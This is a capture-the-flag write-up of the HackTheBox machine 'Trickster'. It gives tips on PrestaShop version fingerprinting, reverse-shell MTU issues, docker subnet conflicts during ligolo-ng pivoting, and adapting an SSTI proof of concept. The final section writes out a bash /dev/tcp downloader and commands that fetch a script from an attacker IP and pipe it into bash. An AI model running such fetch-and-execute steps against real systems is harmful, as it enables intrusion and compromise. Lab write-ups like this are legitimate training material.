# Trickster

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Trickster was a medium-rated Linux machine created by [EmSec](https://app.hackthebox.com/users/962022)

The foothold involved using git-dumper to discover the route to PrestaShop's back office and CVE-2024-34716 to obtain RCE.  
It also included docker enumeration, port forwarding, SSTI in changedetection.io, and credential reuse.  
For privilege escalation, `prusaslicer` had to be abused with a malicious project.

That aside, I'm experimenting with a new approach to documentation: sharing only the elements that I found most educational.  
Unlike my typical write-ups that get bogged down with generic steps, I want to focus on the more intriguing elements.  
For a comprehensive write-up, please refer to [0xdf's solutions](https://0xdf.gitlab.io/2025/02/01/htb-trickster.html)

## Deducing or narrowing the version of open-source projects

With default PHP configuration, all files within the webroot directory get exposed (you need the filenames but they can be fuzzed).  
It can lead to secret exposure, but I want to point out a secondary use, which allows the attacker to narrow down the version of open-source projects.  
On the machine Trickster, an instance of [Prestashop](https://github.com/PrestaShop/PrestaShop) was running. Fuzzing for routes, `/INSTALL.txt` and some other files which, ideally, should not be exposed can be found.  
By comparing the contents of `INSTALL.txt` to the contents across different versions of `INSTALL.txt` on the GitHub repo, we can narrow down the version of PrestaShop running.

My approach involves visiting the concerned file on GitHub and clicking on the History button:

![1](images/1.png)

Then, we can view commit details for each commit and compare those to the `INSTALL.txt` on the target.

![2](images/2.png)

For example, a URL was changed to replace `1.7-documentation` with `v.8-documentation` on September 22, 2023, and that commit got merged on October 4, 2023.  
Since `v.8-documentation` is present on the target, it can be deduced that the version of PrestaShop is at least 8.1.3

PS: PrestaShop v8.1.5 was running on the target.

## Changing MTU for reliable reverse shells

This machine also involved a client-side exploit in PrestaShop: CVE-2024-34716, and I had trouble catching the shell.  
It was due to the non-ideal MTU size on my router. I cannot directly change it on the router, so I had to change it on the VM.

After using the VPN profile, the `tun0` interface has MTU set to a default of 1500:

```console
opcode@debian$ ip link show tun0
4: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN mode DEFAULT group default qlen 500
    link/none
```

I changed it to 1300:

```console
opcode@debian$ sudo ip link set dev tun0 mtu 1300
```

Afterwards, I was able to catch the shells without any issues.

## Changing the local docker subnet

Once on the machine, I uploaded a [statically-linked nmap binary](https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap) to scan for open ports on the containers in the default bridged network.

```console
james@trickster:~$ ifconfig docker0
docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:d3:06:14:f6  txqueuelen 0  (Ethernet)
        RX packets 195  bytes 11540 (11.5 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 27  bytes 1134 (1.1 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

james@trickster:~$ ./nmap -v -p- 172.17.0.1/29
Nmap scan report for 172.17.0.1
Host is up (0.0013s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap scan report for 172.17.0.2
Host is up (0.0015s latency).
Not shown: 65534 closed ports
PORT     STATE SERVICE
5000/tcp open  unknown
```

I used [ligolo-ng](https://github.com/nicocha30/ligolo-ng) to forward them. However, it threw an error when I tried to add the subnet `172.17.0.0/16` to the `ligolo` interface.  
I had `docker` installed on my machine, and the subnet `172.17.0.0/16` was already occupied.

```console
opcode@debian$ docker network ls
NETWORK ID     NAME      DRIVER    SCOPE
56d329c4c0b9   bridge    bridge    local
29aa6043da37   host      host      local
d35a4869ae13   none      null      local
```

```console
opcode@debian$ docker inspect 56d329c4c0b9  
[
    {
        "Name": "bridge",
        "Id": "56d329c4c0b99ddb3d61d6538b43c67883bf5822458b9b5c7460449ddc45bca5",
        "Created": "2024-09-22T06:25:19.9839281-04:00",
        "Scope": "local",
        "Driver": "bridge",
        "EnableIPv6": false,
        "IPAM": {
            "Driver": "default",
            "Options": null,
            "Config": [
                {
                    "Subnet": "172.17.0.0/16",
                    "Gateway": "172.17.0.1"
                }
            ]
        },
        "Internal": false,
        "Attachable": false,
        "Ingress": false,
        "ConfigFrom": {
            "Network": ""
        },
        "ConfigOnly": false,
        "Containers": {},
        "Options": {
            "com.docker.network.bridge.default_bridge": "true",
            "com.docker.network.bridge.enable_icc": "true",
            "com.docker.network.bridge.enable_ip_masquerade": "true",
            "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0",
            "com.docker.network.bridge.name": "docker0",
            "com.docker.network.driver.mtu": "1500"
        },
        "Labels": {}
    }
]
```

I learnt that we could [change the default docker subnet](https://support.hyperglance.com/knowledge/changing-the-default-docker-subnet):

```console
opcode@debian$ echo -e '{\n  "bip": "172.27.0.1/16"\n}' | sudo tee /etc/docker/daemon.json
opcode@debian$ sudo systemctl restart docker
```

```console
opcode@debian$ docker network ls
NETWORK ID     NAME      DRIVER    SCOPE
2c59606d8c9e   bridge    bridge    local
29aa6043da37   host      host      local
d35a4869ae13   none      null      local

opcode@debian$ docker inspect 2c59606d8c9e
[
    {
        "Name": "bridge",
        "Id": "2c59606d8c9e3ecf2f1bfa6a92a717918d1b1653ad292dae60c490a69d4e117b",
        "Created": "2024-09-22T12:09:37.043343438-04:00",
        "Scope": "local",
        "Driver": "bridge",
        "EnableIPv6": false,
        "IPAM": {
            "Driver": "default",
            "Options": null,
            "Config": [
                {
                    "Subnet": "172.27.0.0/16",
                    "Gateway": "172.27.0.1"
                }
            ]
        },
        "Internal": false,
        "Attachable": false,
        "Ingress": false,
        "ConfigFrom": {
            "Network": ""
        },
        "ConfigOnly": false,
        "Containers": {},
        "Options": {
            "com.docker.network.bridge.default_bridge": "true",
            "com.docker.network.bridge.enable_icc": "true",
            "com.docker.network.bridge.enable_ip_masquerade": "true",
            "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0",
            "com.docker.network.bridge.name": "docker0",
            "com.docker.network.driver.mtu": "1500"
        },
        "Labels": {}
    }
]
```

I didn't encounter any errors when I redid the `ligolo-ng` steps.

## Setting a cookie on `requests.Session`

I also faced an issue while exploiting CVE-2024-32651, an SSTI vulnerability in changedetection.io version >= 0.45.20  
The application required a password to access. However, none of the available PoCs took that into account (e.g. <https://github.com/s0ck3t-s3c/CVE-2024-32651-changedetection-RCE>)

After logging in, a cookie named `remember_token` with some value gets created.  
Therefore, to make the PoC usable, I had to modify the script to use this cookie.  
The script was using `requests` library in Python and made good use of `requests.Session`. I found a neat way to set the cookie in that session:

```py
session = requests.Session()
session.cookies.set('remember_token', 'xxxxxxxxxxxxxx', domain='172.17.0.2')
```

## `curl` and `wget` in minimal containers

Later, I also obtained a shell within a minimal container. Even essential utilities like `wget` and `curl` were absent.  
I used an implementation from [here](https://unix.stackexchange.com/questions/83926/how-to-download-a-file-using-just-bash-and-nothing-else-no-curl-wget-perl-et/421318#421318) as an alternative. It makes use of bash's `/dev/tcp` pseudo-device feature.

```bash
function __curl() {
  read proto server path <<<$(echo ${1//// })
  DOC=/${path// //}
  HOST=${server//:*}
  PORT=${server//*:}
  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80

  exec 3<>/dev/tcp/${HOST}/$PORT
  echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
  (while read line; do
   [[ "$line" == $'\r' ]] && break
  done && cat) <&3
  exec 3>&-
}
```

It can be used as follows:

```console
root@a4b9a36ae7ff:~# __curl http://10.10.14.185:8000/deepce.sh | bash
root@a4b9a36ae7ff:~# __curl http://10.10.14.185:8000/cdk > cdk && chmod +x cdk
```
